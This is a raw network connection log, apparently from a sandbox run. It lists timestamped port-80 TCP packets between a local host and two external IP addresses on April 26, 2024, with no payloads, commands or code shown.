Apr 26, 2024 23:09:01.200372934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200408936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200448036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200485945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200498104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200536013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200570107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200638056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200669050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200680017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200685024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200757980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200949907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200992107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.201005936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.201054096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.201096058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.201138020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.232124090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.462847948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.462940931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.462944984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.462954998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463013887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463015079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463013887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463033915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463047981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463063002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463093042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463103056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463109970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463129997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463167906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463207006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463211060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463229895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463257074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463278055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463350058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463439941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463469028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463498116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463582039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463674068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463687897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463709116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463768959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463803053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463829041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463871956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.463947058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463963032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463973999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.463987112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.464000940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.464010000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.464015007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.464032888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.464059114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.464066982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.464076996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.464127064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.464170933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.464827061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.464843035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.464883089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.464884996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.464915991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.464946985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465015888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465078115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465090036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465104103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465116024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465128899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465137005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465157986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465164900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465189934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465218067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465265989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465302944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465336084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465378046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465439081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465509892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465564966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465596914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465627909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.465684891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.465761900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467305899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467341900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467360020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467370987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467407942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467407942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467545033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467571974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467596054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467622042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467634916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467674971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467684031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467725039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467736959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467750072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467762947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467781067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467788935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467796087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467813969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.467844009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467844009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467879057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.467951059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468024969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468031883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468069077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468077898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468112946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468135118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468192101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468209982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468225002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468236923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468244076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468250036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468272924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468292952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468312025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468317986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468343973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468393087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468451977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468499899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468554974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468581915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468595982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468616962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468641996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468648911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468656063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468679905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468700886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468703985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468719959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468741894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468777895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468810081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468823910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468823910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468848944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468852997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468879938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468892097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468904018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.468939066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468986988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.468991995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469028950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469106913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469124079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469134092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469147921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469166040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469170094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469181061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469194889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469223976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469244957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469248056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469266891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469301939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469321012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469348907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469422102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469465971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469487906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469532967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469538927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469578981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469631910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469651937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469677925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469702959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469733953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469752073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469772100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469793081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469799995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469840050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.469937086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.469975948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.470117092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.470163107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.470195055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.470326900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.470330954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.470341921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.470369101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.470397949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.472090006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.472145081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.472146988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.472184896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.474375010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.474456072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.474466085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.474512100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.474688053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.474700928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.474731922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.474757910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.474792004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.474837065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.474853039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.474886894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.474915028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.474919081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.474982977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475037098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.475044966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475059986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475073099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475081921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.475128889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.475277901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475323915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.475326061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475375891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.475694895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475708008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475739002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.475760937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.475764990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475794077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475837946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.475846052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.475888968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.479208946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.479922056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.479971886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.479984999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.479996920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.480019093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.480050087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.480114937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.480272055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.480284929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.480318069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.480344057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.481240988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481399059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481450081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481451988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.481466055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481478930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481487036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.481504917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481528044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.481537104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481554031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.481580973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.481581926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481595039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481621027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.481625080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.481641054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.481666088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.482531071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.482544899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.482578993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.482589006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.482593060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.482625961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.482660055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.483304977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.483340025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.483359098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.483383894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.483391047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.483428955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.483470917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.483484983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.483500004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.483520985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.483556032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.484407902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.484455109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.485418081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.485455036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.485467911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.485475063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.485488892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.485496998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.485519886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.485544920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.485785961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.485831022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.486219883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.486316919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.486470938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.595376015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595391035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595462084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.595648050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595660925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595671892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595683098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595695019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.595702887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595715046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595724106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.595735073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595741987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.595752001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:01.595772982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.595798016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:01.668622017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.757009029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.757251024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.757262945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.757276058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.757304907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.757345915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.757910013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.758658886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.758702993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.758728027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.758740902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.758752108 CEST	80	49734	176.97.76.106	192.168.2.4
